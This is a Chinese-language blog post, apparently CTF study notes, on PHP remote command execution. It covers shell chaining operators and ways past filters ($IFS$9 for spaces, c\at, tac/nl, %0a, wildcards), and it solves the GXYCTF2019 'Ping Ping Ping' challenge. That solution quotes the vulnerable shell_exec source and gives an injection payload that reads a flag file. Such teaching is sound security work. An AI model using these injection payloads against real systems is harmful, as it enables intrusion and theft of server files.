RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)
分为远程命令执行ping和远程代码执行eval。
exce(ping)远程系统命令执行
1.原理
以PHP为例,`system、exec、shell_exec、passthu、popen、proc_popen`等函数可以执行系统命令。当我们可以控制这些函数的参数时,就能运行我们想运行的命令,从而进行攻击。2.利用管道符来实现
主要是win和Linux,管道符两边的语句之间可有空格,也可以没有2.1掌握有关命令执行的知识
windows 或 linux 下:command1 && command2 先执行 command1,如果为真,再执行 command2
command1 | command2 只执行 command2
command1 & command2 先执行 command2 后执行 command1
command1 || command2 先执行 command1,如果为假,再执行 command2命令执行漏洞
(| || & && 称为 管道符)
2.2 Linux特有的
;无论真假都执行跟&一样3.绕过方法
3.1过滤cat
cat的目的就是打开指定的文件,只需要将cat换成其他的打开文件的命令就行了,整个过程还是一样的,还有就是直接在cat中插入\变成c\at,也可以绕过过滤。cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
3.2过滤空格
使用< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1
来代替空格
3.3过滤目录分割符
cd是进入文件夹,而cat是打开文件绕过方法:`cd flag_is_here;ls`=`ls \flag_is_here`
3.4管道符过滤
1.用`;`或者其他管道符`127.0.0.1;ls`2.如果已知flag文件名,则使用base64`base64 1.php`相当于`cat 1.php|base64`
,输出的是base64后的
3.假如`;`也被过滤的话,则用%0a(;,为url 编码),但要注意要在url上打
3.5字符绕过(如flag、php)
利用通配符?*`127.0.0.1|cat fal?.php`4.实战
做个[GXYCTF2019]Ping Ping Ping
源码
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else if(preg_match("/bash/", $ip)){ die("fxck your bash!"); } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("fxck your flag!"); } $a = shell_exec("ping -c 4 ".$ip); echo " "; print_r($a); } ?>
过滤了很多东西但是发现了一种方法可以绕过
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
我们通过;来拼接执行执行代码,通过$IFS$9绕过空格限制,然后拼接指令即可,但这里过滤了flag,要绕过正则匹配必须fl写在后面的哪个变量中
标签:command2,IFS,ip,cat,命令,RCE,执行,match From: https://www.cnblogs.com/mu-yi2/p/16748435.html